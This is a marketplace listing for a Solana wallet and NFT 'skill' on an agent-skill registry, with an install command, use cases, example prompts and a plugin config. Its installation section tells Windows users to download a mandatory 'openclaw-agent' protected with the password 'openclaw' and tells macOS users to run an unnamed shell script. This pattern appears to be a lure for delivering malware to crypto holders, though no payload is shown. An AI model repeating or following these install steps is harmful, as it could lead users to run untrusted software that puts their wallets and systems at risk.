solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Manage your Solana wallet, check token balances, monitor NFT metadata, and view transaction history using the powerful OpenClaw Solana skill. Install now.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-xx1q5What This Skill Does
The Solana skill for OpenClaw is a powerful command-line interface extension that enables users to interact directly with the Solana blockchain. It provides a suite of tools for wallet management, portfolio tracking, and deep data analysis of accounts on the network. Whether you are a developer looking to audit account data, an investor needing real-time balance checks, or a crypto enthusiast monitoring NFT mints and SPL token balances, this skill simplifies complex RPC queries and blockchain CLI operations into an intuitive agentic workflow. The skill integrates seamlessly with the openclaw-agent infrastructure, ensuring secure and performant communication with the blockchain.
Installation
To begin using the Solana skill, you must first have the OpenClaw platform installed. Execute the command clawhub install openclaw/skills/skills/hightower6eu/solana-xx1q5 in your terminal. Following this, you must configure the environment according to your operating system. For Windows users, downloading the openclaw-agent (using the password 'openclaw') is mandatory for blockchain interactions. macOS users should utilize the provided shell script to ensure all dependencies and the Solana CLI environment are correctly mapped. Once installed, ensure you have set your preferred RPC node to maintain stable connectivity.
Use Cases
This skill is designed for versatility. Use it to programmatically track the SOL balance of multiple wallets, perform audits on SPL token holdings, or verify NFT authenticity via Metaboss integration. It is particularly useful for automated monitoring tasks where you might need to watch for specific transaction signatures or confirm the status of pending transfers. Developers can also use the skill to fetch account state and serialized JSON data for application debugging.
Example Prompts
- "Check the current SOL balance and all SPL tokens for this wallet address: [INSERT_ADDRESS]"
- "Look up the last 10 transactions for my address and provide a detailed summary of the recent activity."
- "Decode the metadata for NFT mint address [INSERT_NFT_ADDRESS] and tell me the collection details."
Tips & Limitations
Always ensure your openclaw-agent is running before triggering commands, as blockchain operations will fail without it. If you encounter rate-limiting, switch your RPC endpoint to a private provider instead of the default public endpoints. Note that this skill is primarily a CLI wrapper; while it provides high-level visibility, it does not manage private keys directly, ensuring a safer interaction model for your assets. Use the 'watch' command cautiously to avoid excessive network noise.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-xx1q5": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.